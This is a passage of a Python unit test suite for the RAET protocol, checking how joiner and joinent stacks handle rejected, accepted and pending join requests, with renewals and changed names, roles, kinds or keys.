name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Rejected
beta.keep.rejectRemote(betaRemote)
# Ensure remote status is Rejected
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Old
# Keys: Old
# Sameness: SameAll
keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
# Mutable: Either (use Yes as more loyal)
beta.mutable = True
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Reject, Remove Clear
for stack in [alpha, beta]:
self.assertTrue(len(stack.stats) > 0)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertEqual(len(alpha.transactions), 1)
self.assertEqual(len(beta.transactions), 0)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertNotIn('joinent_transaction_failure', alpha.stats)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousRejectedRejectSameRoleKeys(self):
'''
Test joiner reject rejected vacuous renewal join with same role/keys (C2)
'''
console.terse("{0}\n".format(self.testJoinerVacuousRejectedRejectSameRoleKeys.__doc__))
# Mode: Never, Once
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: Yes
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Rejected
beta.keep.rejectRemote(betaRemote)
# Ensure remote status is Rejected
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Name: Either
oldName = alpha.name
newName = '{0}_new'.format(oldName)
alpha.name = newName
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Old
# Keys: Old
# Sameness: Same Role/Keys
keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
# Mutable: Either
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Reject, Remove Clear
for stack in [alpha, beta]:
self.assertTrue(len(stack.stats) > 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertEqual(len(alpha.transactions), 0)
self.assertEqual(len(beta.transactions), 0)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousRejectedNorenewRejectSameAll(self):
'''
Test joiner reject rejected vacuous no renewal join with same all (C3)
'''
console.terse("{0}\n".format(self.testJoinerVacuousRejectedNorenewRejectSameAll.__doc__))
# Mode: Never, Once
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: Yes
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Rejected
beta.keep.rejectRemote(betaRemote)
# Ensure remote status is Rejected
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Name: Body
# Main: Body
# Kind: Body
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Body
# Keys: Body
# Sameness: SameAll
keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
# Mutable: Either (use Yes as more loyal)
beta.mutable = True
# Test
# Renew: No
self.join(beta, alpha, deid=betaRemote.nuid, renewal=False)
# Action: Reject, Remove Clear
for stack in [alpha, beta]:
self.assertTrue(len(stack.stats) > 0)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertEqual(len(alpha.transactions), 1)
self.assertEqual(len(beta.transactions), 0)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertNotIn('joinent_transaction_failure', alpha.stats)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousAcceptNewName(self):
'''
Test mutable joiner accept vacuous renewal join with updated name (D1)
'''
console.terse("{0}\n".format(self.testJoinerVacuousAcceptNewName.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: New
oldName = alpha.name
newName = '{0}_new'.format(oldName)
alpha.name = newName
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Mutable: Yes
beta.mutable = True
# Vacuous: Yes
betaRemote.fuid = 0
betaRemote.sid = 0
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.name, newName)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousAcceptNewMain(self):
'''
Test mutable joiner accept vacuous renewal join with updated main (D2)
'''
console.terse("{0}\n".format(self.testJoinerVacuousAcceptNewMain.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
# Main: New, it can only happen if old Main value is False (or None) it's because Joinent could only be main
# to accept transaction. So bootstrap slave alpha joined to main beta. Then set alpha to be main and rejoin.
beta, alpha = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Either
# Main: New
oldMain = None
newMain = True
self.assertIs(alpha.main, oldMain)
alpha.main = newMain
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: Yes
betaRemote.fuid = 0
betaRemote.sid = 0
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.main, newMain)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousAcceptNewKind(self):
'''
Test mutable joiner accept vacuous renewal join with updated kind (D3)
'''
console.terse("{0}\n".format(self.testJoinerVacuousAcceptNewKind.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Either
# Main: Either
# Kind: New
oldKind = alpha.kind
newKind = 33
self.assertNotEqual(oldKind, newKind)
alpha.kind = newKind
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: Yes
betaRemote.fuid = 0
betaRemote.sid = 0
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.kind, newKind)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousAcceptNewKeys(self):
'''
Test mutable joiner accept vacuous renewal join with updated keys (D4)
'''
console.terse("{0}\n".format(self.testJoinerVacuousAcceptNewKeys.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Always
alpha, beta = self.bootstrapJoinedRemotes(autoMode=raeting.AutoMode.always.value)
betaRemote = beta.remotes.values()[0]
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Old
# Keys: New
alpha.local.signer = nacling.Signer()
alpha.local.priver = nacling.Privateer()
alpha.dumpLocalRole()
# Sameness: Not sameall, not same role/keys
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: Yes
betaRemote.fuid = 0
betaRemote.sid = 0
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertFalse(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.verfer.keyhex, alpha.local.signer.verhex)
self.assertEqual(betaRemote.pubber.keyhex, alpha.local.priver.pubhex)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousAcceptNewRole(self):
'''
Test mutable joiner accept vacuous renewal join with updated role (D5)
'''
console.terse("{0}\n".format(self.testJoinerVacuousAcceptNewRole.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Either
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: New
oldRole = alpha.local.role
newRole = '{0}_new'.format(oldRole)
alpha.local.role = newRole
# Keys: Either
# Sameness: Not sameall, not same role/keys
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: Yes
betaRemote.fuid = 0
betaRemote.sid = 0
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Ensure beta knows nothing about new role
roleData = beta.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertFalse(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.role, newRole)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousAcceptSameAll(self):
'''
Test joiner accept vacuous renewal join with sameall (E1)
'''
console.terse("{0}\n".format(self.testJoinerVacuousAcceptSameAll.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always (use never as most strict)
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Old
# Keys: Old
# Sameness: SameAll
keep = self.copyData(betaRemote)
# Mutable: Either (use false as more strict)
self.assertIs(beta.mutable, None)
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: Yes
betaRemote.fuid = 0
betaRemote.sid = 0
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousNorenewAcceptSameAll(self):
'''
Test joiner accept vacuous no renew join with sameall (E2)
'''
console.terse("{0}\n".format(self.testJoinerVacuousNorenewAcceptSameAll.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always (use never as most strict)
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Body
# Keys: Body
# Sameness: SameAll
keep = self.copyData(betaRemote)
# Mutable: Either (use No as more strict)
self.assertIs(beta.mutable, None)
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: Yes
betaRemote.fuid = 0
betaRemote.sid = 0
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: No
self.join(beta, alpha, deid=betaRemote.nuid, renewal=False)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertIs(beta.mutable, None)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousPendingPendNewName(self):
'''
Test mutable joiner pend pending vacuous renewal join with updated name (F1)
'''
console.terse("{0}\n".format(self.testJoinerVacuousPendingPendNewName.__doc__))
alpha, alphaData = self.bootstrapStack(name='alpha',
ha=("", raeting.RAET_PORT),
main=True,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(alpha.local.role, 'alpha')
self.assertEqual(alpha.ha, ('0.0.0.0', raeting.RAET_PORT))
self.assertEqual(alpha.local.ha, ('127.0.0.1', raeting.RAET_PORT))
beta, betaData = self.bootstrapStack(name='beta',
ha=("", raeting.RAET_TEST_PORT),
main=None,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(beta.local.role, 'beta')
self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
# Do initial join vacuous join to setup rejoin with renew
# create remote to join to alpha
remote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
self.join(beta, alpha, deid=remote.uid)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, True)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
alphaRemoteBeta = alpha.remotes.values()[0]
self.assertEqual(alphaRemoteBeta.name, 'beta')
betaRemoteAlpha = beta.remotes.values()[0]
self.assertEqual(betaRemoteAlpha.name, 'alpha')
# save the current state of beta stack remote for alpha
betaRemoteAlphaSave = self.copyData(betaRemoteAlpha)
# move alpha stack remote for beta to different uid (nuid) to force renew
oldUid = alphaRemoteBeta.uid
alpha.moveRemote(alphaRemoteBeta, alphaRemoteBeta.uid + 1)
self.assertNotEqual(alphaRemoteBeta.uid, oldUid)
self.assertIs(alpha.remotes[alphaRemoteBeta.uid], alphaRemoteBeta)
# Status: Pending
beta.keep.pendRemote(betaRemoteAlpha)
self.assertEqual(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
beta.keep.auto = raeting.AutoMode.never.value
self.assertEqual(beta.keep.auto, raeting.AutoMode.never.value)
# Name: New # have to do this mid transaction below
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Either
# Keys: Either
# Sameness: Not sameall
# Mutable: Yes
self.assertIs(beta.mutable, True)
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
beta.clearStats()
alpha.clearStats()
# Test
# Renew: Yes
# Name change of Joinent on renew rejoin could occur several ways
# One is Joinent is dynamically changing its name mid transaction
# Another is Joinent name was changed between end of
# Join where Joinent refused with nack renew transaction
# and start of Joiner renew rejoin We implement the later
